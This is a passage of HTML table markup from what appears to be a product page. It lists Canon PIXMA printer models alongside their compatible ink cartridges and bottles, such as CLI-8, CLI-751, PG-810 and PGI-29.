width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 